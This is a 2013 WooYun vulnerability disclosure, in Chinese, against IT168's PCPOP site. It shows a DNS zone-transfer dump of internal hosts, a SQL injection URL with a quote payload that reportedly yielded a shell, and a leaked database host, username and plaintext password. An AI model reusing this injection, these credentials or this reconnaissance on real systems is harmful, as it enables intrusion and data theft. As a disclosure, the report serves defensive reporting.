漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-022282
漏洞标题:it168第三弹-PCPOP 数据库链接密码泄露,已shell,可遍历内网数据
相关厂商:IT168.com
漏洞作者: 工作专用
提交时间:2013-04-22 14:02
修复时间:2013-06-06 14:02
公开时间:2013-06-06 14:02
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-04-22: 细节已通知厂商并且等待厂商处理中
2013-04-22: 厂商已经确认,细节仅向厂商公开
2013-05-02: 细节向核心白帽子及相关领域专家公开
2013-05-12: 细节向普通白帽子公开
2013-05-22: 细节向实习白帽子公开
2013-06-06: 细节向公众公开
简要描述:
各种漏洞综合到一起。齐活!
详细说明:
SVN权限为设置 导致下载源码
这里 获得源码以后 开始检查 各个字符连接串等。
获得一堆!
uc.pcpop.com
获得 UC主库的数据库连接字符串。
n个
使用NSLOOKUP 发现存在列域漏洞
挨个测试漏洞吧。、
> ls pcpop.com
pcpop.com. NS server = ns1.pcpop.com
pcpop.com. NS server = ns2.pcpop.com
pcpop.com. A 59.151.37.230
331 A 219.148.35.100
a A 221.192.136.246
*.a A 221.192.136.246
club.a A 219.148.35.85
ad3 A 221.192.136.149
ad4 A 221.192.136.148
android A 219.148.35.25
app A 219.148.35.84
baojia A 219.148.35.191
battery A 219.148.35.96
bbs A 219.148.35.25
anhui.bbs A 219.148.35.25
hebei.bbs A 219.148.35.25
houtai.bbs A 221.192.136.60
img.bbs A 219.148.35.133
bbs2 A 221.192.136.102
bbsdown A 219.148.35.133
bbst A 219.148.35.25
shouji.bbst A 219.148.35.25
bqq A 219.141.178.5
ces A 219.148.35.102
cg A 221.192.136.148
channel A 219.148.35.83
chrome A 219.148.35.69
club A 219.148.35.9
club A 219.148.35.70
comment A 219.148.35.191
comment3 A 219.148.35.191
cool A 221.192.136.149
count A 219.148.35.84
cs A 121.28.95.19
d1 A 219.148.35.129
d1 A 219.148.35.130
dell A 219.148.35.25
dianping A 219.148.35.93
dod A 121.28.95.19
down1 A 219.148.35.133
down2 A 219.148.35.133
down3 A 219.148.35.133
down4 A 219.148.35.133
dx1 A 61.160.192.132
f1 A 219.148.35.83
fan A 121.28.95.19
g A 219.148.35.86
gg A 219.148.35.42
hezi A 219.148.35.218
hptools A 219.148.35.18
hr A 61.55.167.46
iapple A 221.192.136.27
idea A 219.148.35.25
ideabbs A 219.148.35.25
imgpv A 221.192.136.180
imgs A 219.148.35.67
imgs A 219.148.35.68
imgs A 219.148.35.77
ios A 219.148.35.25
jiangjia A 219.148.35.89
l A 219.148.35.89
lephone A 219.148.35.25
live A 219.148.35.69
admin.lixiang A 221.192.136.245
mail A 221.192.136.211
mall A 221.192.136.215
maopao A 219.148.35.102
my A 219.148.35.25
newbbs A 219.148.35.234
ns1 A 221.192.136.150
ns2 A 219.148.35.66
nvidiaclub A 219.148.35.91
open A 219.148.35.70
pao A 219.148.35.25
paoattach A 219.148.35.218
pcmall A 221.192.136.205
pf A 219.148.35.70
ph A 221.192.136.247
photo A 219.148.35.102
pic A 61.182.160.85
play A 221.192.136.159
pmm A 219.148.35.218
pop A 219.148.35.25
group.pop A 219.148.35.93
houtai.pop A 219.148.35.93
houtai2.pop A 219.148.35.93
houtai3.pop A 221.192.136.60
mail.pop A 221.192.136.180
tv.pop A 59.151.39.39
popattach A 61.55.167.199
pp A 221.192.136.148
pp.product A 221.192.136.148
product1 A 219.148.35.89
product2 A 221.192.136.148
pu A 219.148.35.218
publish A 221.192.136.247
q A 219.148.35.91
ren A 221.192.136.246
rtx A 219.141.178.5
s1 A 60.28.208.249
sendmail A 221.192.136.211
sf A 219.148.35.129
sf A 219.148.35.130
*.shop A 219.148.35.83
cnc.shop A 221.192.136.39
com.shop A 219.148.35.83
bbs.smb A 219.148.35.86
smsso A 219.148.35.47
so A 219.148.35.114
img.softbbs A 219.148.35.133
softup A 221.204.242.168
spms A 61.55.167.198
squid A 221.192.136.47
squid2 A 221.192.136.46
sso A 219.148.35.93
svn A 10.168.0.78
taobao A 221.192.136.148
test1 A 221.192.136.180
test2 A 221.192.136.180
test3 A 221.192.136.180
test4 A 221.192.136.15
test5 A 221.192.136.184
testwap A 221.192.136.15
tg A 221.192.136.27
toothbrush A 219.148.35.96
tuan A 219.148.35.102
img.tuan A 219.148.35.25
img1.tuan A 219.148.35.133
uc A 219.148.35.25
vip A 202.106.124.55
wanke A 219.148.35.102
wap A 221.192.136.98
win A 219.148.35.25
woyaoxuan A 219.148.35.218
www1 A 219.148.35.89
zhuanti A 219.148.35.96
到这里发现盒子 注射一枚
http://hezi.pcpop.com/register/CheckCode?invcode=工作专用' 注射
获得SHELL.
$config['suc']['charset'] = 'UTF-8';
define('UC_DBHOST', '129.0.0.245');
define('UC_DBUSER', 'pcpopsns');
define('UC_DBPW', '951623');
嗯 以上数据库 口令知道了 遍历内网MYSQL。
漏洞证明:
SVN权限为设置 导致下载源码
这里 获得源码以后 开始检查 各个字符连接串等。
获得一堆!
uc.pcpop.com
获得 UC主库的数据库连接字符串。
n个
使用NSLOOKUP 发现存在列域漏洞
挨个测试漏洞吧。、
到这里发现盒子 注射一枚
http://hezi.pcpop.com/register/CheckCode?invcode=工作专用' 注射
获得SHELL.
$config['suc']['charset'] = 'UTF-8';
define('UC_DBHOST', '129.0.0.245');
define('UC_DBUSER', 'pcpopsns');
define('UC_DBPW', '951623');
嗯 以上数据库 口令知道了 遍历内网MYSQL。
修复方案:
漏洞综合应用!
版权声明:转载请注明来源 工作专用@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2013-04-22 15:07
厂商回复:
多谢洞主。
最新状态:
暂无